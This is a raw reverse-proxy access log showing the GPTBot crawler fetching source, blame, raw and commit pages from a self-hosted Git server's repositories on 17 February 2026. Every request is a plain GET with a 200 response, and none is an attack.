[Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:15:23:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 10939] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:15:23:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 10940] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:15:23:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 316] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:15:23:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 316] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:15:23:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 316] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:15:23:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 316] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:15:23:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 316] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:15:23:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?files=.Backup%2fhtml%2fassets%2fimages%2finstrument.png" [Client 74.7.227.38] [Length 19810] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/instrument.png" -[17/Feb/2026:15:23:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/package.json?display=source" [Client 74.7.227.38] [Length 11685] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/package.json" -[17/Feb/2026:15:23:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/package.json?display=rendered" [Client 74.7.227.38] [Length 10879] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/package.json" -[17/Feb/2026:15:23:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/package.json?display=source" [Client 74.7.227.38] [Length 11685] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/package.json" -[17/Feb/2026:15:23:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/package.json?display=rendered" [Client 74.7.227.38] [Length 10878] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/package.json" -[17/Feb/2026:15:23:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html" [Client 74.7.227.38] [Length 227361] [Gzip 18.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol" -[17/Feb/2026:15:23:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/998d733eb52423ffff2f8602efdfb1282198a61f?files=Dockerfile" [Client 74.7.227.38] [Length 18878] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/Dockerfile" -[17/Feb/2026:15:23:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/OpcTest%20program%20by%20claude.md" [Client 74.7.227.38] [Length 9923] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/OpcTest%20program%20by%20claude.md" -[17/Feb/2026:15:23:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/index.tsx?display=source" [Client 74.7.227.38] [Length 11632] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/index.tsx" -[17/Feb/2026:15:23:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/README.md?display=source" [Client 74.7.227.38] [Length 15804] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/README.md" -[17/Feb/2026:15:23:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 20373] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project" -[17/Feb/2026:15:23:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/tsconfig.json?display=source" [Client 74.7.227.38] [Length 11873] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/tsconfig.json" -[17/Feb/2026:15:23:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/status.json?display=source" [Client 74.7.227.38] [Length 11065] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/status.json" -[17/Feb/2026:15:23:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/services/geminiService.ts?display=rendered" [Client 74.7.227.38] [Length 10911] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/services/geminiService.ts" -[17/Feb/2026:15:23:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/metadata.json?display=source" [Client 74.7.227.38] [Length 11278] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/metadata.json" -[17/Feb/2026:15:23:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/status.json?display=rendered" [Client 74.7.227.38] [Length 10896] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/status.json" -[17/Feb/2026:15:23:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html" [Client 74.7.227.38] [Length 9923] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html" -[17/Feb/2026:15:23:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html" [Client 74.7.227.38] [Length 347418] [Gzip 27.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html" -[17/Feb/2026:15:23:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=.Notebook%2fOpcTest%20program%20by%20claude.md" [Client 74.7.227.38] [Length 34366] [Gzip 8.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/OpcTest%20program%20by%20claude.md" -[17/Feb/2026:15:23:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html" [Client 74.7.227.38] [Length 323599] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/xref-PostgresPatrol.html" -[17/Feb/2026:15:23:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/package.json?display=rendered" [Client 74.7.227.38] [Length 10874] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/package.json" -[17/Feb/2026:15:23:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 9943] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/Project%20Planning-1.md" -[17/Feb/2026:15:23:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 43156] [Gzip 20.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/Project%20Planning-1.md" -[17/Feb/2026:15:23:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 19269] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/Project%20Planning-1.md" -[17/Feb/2026:15:23:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/tsconfig.json?display=rendered" [Client 74.7.227.38] [Length 10868] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/tsconfig.json" -[17/Feb/2026:15:23:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/metadata.json?display=rendered" [Client 74.7.227.38] [Length 10869] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/metadata.json" -[17/Feb/2026:15:23:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log?display=rendered" [Client 74.7.227.38] [Length 10989] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/letsencrypt.log" -[17/Feb/2026:15:23:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt-requests_access.log?display=rendered" [Client 74.7.227.38] [Length 11009] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt-requests_access.log" -[17/Feb/2026:15:23:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fmain.py" [Client 74.7.227.38] [Length 22082] [Gzip 3.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/main.py" -[17/Feb/2026:15:23:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/services/geminiService.ts?display=source" [Client 74.7.227.38] [Length 13162] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/services/geminiService.ts" -[17/Feb/2026:15:23:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6?files=PostgresMonitor%2fbuild%2fPostgresWatchdog%2fAnalysis-00.toc" [Client 74.7.227.38] [Length 18213] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" -[17/Feb/2026:15:23:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__" [Client 74.7.227.38] [Length 10370] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher" -[17/Feb/2026:15:23:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__" [Client 74.7.227.38] [Length 10345] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher" -[17/Feb/2026:15:23:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/project.assets.json" [Client 74.7.227.38] [Length 9905] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/project.assets.json" -[17/Feb/2026:15:23:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/types.ts?display=source" [Client 74.7.227.38] [Length 11501] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/types.ts" -[17/Feb/2026:15:23:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/.gitignore?display=source" [Client 74.7.227.38] [Length 11474] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/.gitignore" -[17/Feb/2026:15:24:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 18918] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build" -[17/Feb/2026:15:24:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeCache.txt" [Client 74.7.227.38] [Length 18917] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build" -[17/Feb/2026:15:24:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include" [Client 74.7.227.38] [Length 10709] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp" -[17/Feb/2026:15:24:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include" [Client 74.7.227.38] [Length 10704] [Gzip 3.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp" -[17/Feb/2026:15:24:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 10464] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:15:24:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 10461] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:15:24:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__" [Client 74.7.227.38] [Length 9899] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__" -[17/Feb/2026:15:24:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr 